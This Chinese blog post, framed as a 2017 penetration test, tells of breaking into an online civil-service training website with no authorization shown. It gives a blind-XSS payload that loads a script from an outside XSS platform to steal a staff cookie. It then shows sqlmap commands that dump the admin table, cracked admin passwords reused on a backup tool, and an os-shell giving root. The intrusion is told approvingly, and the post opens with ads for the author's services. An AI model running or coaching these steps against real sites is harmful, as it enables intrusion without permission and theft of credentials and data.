記一次以小勃大,緊張刺激的滲透測試(2017年老文)
零、前言
有技術交流或滲透測試培訓需求的朋友歡迎聯絡QQ/VX-547006660,需要程式碼審計、滲透測試、紅藍對抗網路安全相關業務可以看置頂博文
2000人網路安全交流群,歡迎大佬們來玩
群號820783253
一、起因
emmm,炎炎夏日到來,這麼個桑拿天干什麼好呢?
沒錯,一定要坐在家裡,吹著空調,吃著西瓜,然後靜靜地挖洞。挖洞完叫個外賣,喝著啤酒,擼著燒烤,豈不美哉?然此可為智者道,難為俗人言也。。。正在我沉迷在對夏日的意淫之時,我親愛的媽媽忽然給我來了一波奪命連環call。
大概內容如下: --媽媽:兒呀。。。你印布隱私(認不認識)搞公務員培訓的機構,幫我在網上瞅瞅去,我有個朋友他兒想考公務員~ --我:(聲音笑嘻嘻,心裡mmp)哎呀,這個bia的天,擱家裡睡覺行了。。別弄了。。 --媽媽:MLGB,叫你整,你就快點的,晚上給我回電話。 哎,父母之命不可違,悲傷的我只能放下手裡的鍵盤和瓜皮,開始去百度上找培訓機構。
百度上面找了好久,都沒找到太合適的。問了問身邊的朋友:朋友給了一家網校的報名地址
http://.com/3g//2203947.htm
沒錯,還帶免費試學。。。真的先進。。。。
然而作為一名做培訓的職業小學生,怎麼肯輕信這種網校的培訓質量?於是開啟愛站查了一波權重。。。
這尼瑪???百度權7,emmm,有點意思。見到這麼高權重的站,那時我已飢渴難耐,便決定對此站點來一波滲透測試。
二、XSS盲打?安排一下
看到這裡,小夥伴們肯定想。。。emm,是不是可以XSS打一下試試呢?
說幹咱就幹。。。見框就插,接下來就插入xss payload試試吧。。。
Payload: </textarea><script src="="http://xsspt.com/z6ocdy?1531815744"></script>
將payload完整黏貼進去,如圖發現僅有</tex 這四個字元
審查元素看下,在表單處理上設定了maxlength,直接審查元素大法改掉就好了
max length改為999
然後我們的XSS Payload就可以正常地全部輸入到表單中了
手機那個文字框,我隨便填了11位數字,然後點選提交,萬幸的的是提交成功了(後端沒對內容進行驗證)
過了大概1個小時,突然XSS平臺的郵件來了,興奮ing。。。(客服是真的敬業)
拿著cookie,掛好代理傻啦吧唧地就是進入後臺一波瀏覽,發現許可權非常小,基本上只能處理處理客服工作
不過可以檢視後臺的管理員賬號。。。。。(果然是個大站,後臺分工許可權這麼講究。。。)
看著這麼多的超級管理員賬號,而我卻只是個吊毛客服,基本上沒什麼許可權,心裡真的難受的一批。。
難道我們的滲透到這裡就要結束??不可能,這顯然不符合本屌的風格。。。
於是我又仔細地翻了翻後臺,看看有沒有地方可以來一波騷操作。。。
三、後臺SQL注入?講究
大家可以看到我們的客服處理介面是可以進行查詢的,查詢的過程是通過GET方式傳導一個mobile引數實現查詢
我們直接測試一下SQL注入的Payload,看看是否存在注入。發現頁面沒有返回資訊,那麼就很有可能存在SQL注入。
我們使用BurpSuite來抓取本出的的HTTP請求,然後儲存在C:\Users\Samsung 700Z5C\Desktop\1.txt中
接下來到了以小勃大,緊張刺激的時刻,使用SQLMAP的 -r引數,注入本HTTP請求
sqlmap -r C:\Users\Samsung 700Z5C\Desktop\1.txt
注入成功了。哈哈哈。。。。我們開始直奔管理員的表
命令為sqlmap -r C:\Users\Samsung 700Z5C\Desktop\1.txt --tables -D "nd_net" //列出nd_net資料庫的表
然後執行
sqlmap -r C:\Users\Samsung 700Z5C\Desktop\1.txt --columns -T "net_admin_user" -D "nd_net" //列出net_admin_user表的欄位
最後執行命令
sqlmap.py -r "I:\T00l\1.txt" --dump -C "id,nd_user,userid,nd_pass" -T "net_admin_user" -D "nd_net" --threads=10 //匯出net_admin_user表中id,nd_user,userid,nd_pass幾個欄位的資料
全部是md5加密,拿到cmd5,一波解密,成功獲取到所有管理員的賬號密碼,然後成功登陸以管理員的許可權登陸後臺
哈哈,講究!
四、不拿Shell,與鹹魚有什麼區別?
emm,就算是管理員的許可權。我發現可以利用的地方依然很少,只有一些靜態頁面的編輯許可權(而且編輯器是KindEditor,沒什麼方法上傳拿Shell),我當時十分絕望。。。但是我發現了這個——資料庫備份
點選後,跳轉到一款叫做“帝國備份王”的程式
隨後,我便去該程式的官網,下載了一個幫助文件。使用預設使用者admin/123456進行登陸,但是以失敗告終。
但我怎末可能放棄,我一個一個測試了之前後臺SQL注入得到的密碼(有驗證碼,沒法爆破的),最終在一個密碼上成功地登陸了。。。我靠,高興死我。。。。。。。。
發現了一個PHP探針
再掏出SQLMAP,直接使用命令 sqlmap -r C:\Users\Samsung 700Z5C\Desktop\1.txt --os-shell //獲取shell
輸入我們通過探針得到的路徑,很幸運,ROOT許可權直接os-shell成功。直接上一句話,GetShell完美結束
五、總結
本次滲透測試,雖然沒有騷操作,但是總體來說用到了許多知識,現進行總結
1.XSS盲打技術
2.SQLMAP注入HTTP響應包的語法
3.人性的弱點分析(多個程式用同一個管理密碼)
4.從獲取絕對路徑到SQLMAP獲取shell
5.審查元素小技巧